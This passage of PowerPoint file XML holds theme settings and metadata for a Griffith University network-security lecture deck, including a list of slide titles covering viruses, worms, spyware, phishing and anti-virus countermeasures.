            <a:effectLst/>
            <a:latin typeface="Times" pitchFamily="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0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:effectLst/>
            <a:latin typeface="Times" pitchFamily="2" charset="0"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:lnDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst>
    <a:extraClrScheme>
      <a:clrScheme name="GUG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UG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UG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UG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UG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UG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UG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UGC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99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UGC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99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C:\Documents and Settings\user\Application Data\Microsoft\Templates\GUGC.pot</Template>
  <TotalTime>4883</TotalTime>
  <Words>2260</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>393</Paragraphs>
  <Slides>43</Slides>
  <Notes>6</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GUGC</vt:lpstr>
      <vt:lpstr>3413ICT  Network Security</vt:lpstr>
      <vt:lpstr>Previous Lecture..</vt:lpstr>
      <vt:lpstr>Today’s Objectives</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Malicious Software </vt:lpstr>
      <vt:lpstr>Malicious Software</vt:lpstr>
      <vt:lpstr>Backdoors</vt:lpstr>
      <vt:lpstr>Logic Bomb</vt:lpstr>
      <vt:lpstr>Trojan Horse</vt:lpstr>
      <vt:lpstr>Zombie</vt:lpstr>
      <vt:lpstr>Nature of Viruses</vt:lpstr>
      <vt:lpstr>Virus Structure</vt:lpstr>
      <vt:lpstr>An Example (Shell) Virus</vt:lpstr>
      <vt:lpstr>Compression Virus</vt:lpstr>
      <vt:lpstr>Types of Viruses</vt:lpstr>
      <vt:lpstr>Parasitic Virus</vt:lpstr>
      <vt:lpstr>Memory Resident Virus</vt:lpstr>
      <vt:lpstr>Boot Sector Virus</vt:lpstr>
      <vt:lpstr>Stealth Virus</vt:lpstr>
      <vt:lpstr>Polymorphic Virus</vt:lpstr>
      <vt:lpstr>Macro Virus</vt:lpstr>
      <vt:lpstr>Portable Code Virus</vt:lpstr>
      <vt:lpstr>Email Virus</vt:lpstr>
      <vt:lpstr>Worms</vt:lpstr>
      <vt:lpstr>Worm Operation (Exam question)</vt:lpstr>
      <vt:lpstr>Morris Worm</vt:lpstr>
      <vt:lpstr>Recent Worm Attacks</vt:lpstr>
      <vt:lpstr>Worm Technology</vt:lpstr>
      <vt:lpstr>Spyware</vt:lpstr>
      <vt:lpstr>Spyware (eg.) </vt:lpstr>
      <vt:lpstr>Hoaxes</vt:lpstr>
      <vt:lpstr>Virus Countermeasures</vt:lpstr>
      <vt:lpstr>Anti-Virus Techniques</vt:lpstr>
      <vt:lpstr>Digital Immune System</vt:lpstr>
      <vt:lpstr>Digital Immune System</vt:lpstr>
      <vt:lpstr>Digital Immune System</vt:lpstr>
      <vt:lpstr>Behavior-Blocking Software</vt:lpstr>
      <vt:lpstr>Phishing = Fishing ?!</vt:lpstr>
      <vt:lpstr>What is Phishing ? </vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Next Lecture </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Griffith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subject>6216/3112INT Network Security</dc:subject>
  <dc:creator>Ian Graham</dc:creator>
  <cp:lastModifiedBy>Anthony Guevara</cp:lastModifiedBy>
  <cp:revision>185</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2003-01-15T03:46:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-04-02T00:13:39Z</dcterms:modified>
</cp:coreProperties>
</file>